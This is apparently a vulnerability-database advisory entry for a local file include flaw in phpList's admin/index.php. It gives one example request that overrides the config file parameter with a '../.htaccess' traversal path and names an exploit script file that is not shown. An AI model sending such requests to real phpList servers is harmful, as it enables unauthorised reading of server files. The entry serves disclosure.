• info
• discussion
• exploit
• solution
• references

phpList 'admin/index.php' Local File Include Vulnerability

Attackers can exploit this issue via a browser.

The following example URI and exploit code are available:

http://www.example.com/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess

• /data/vulnerabilities/exploits/33273.pl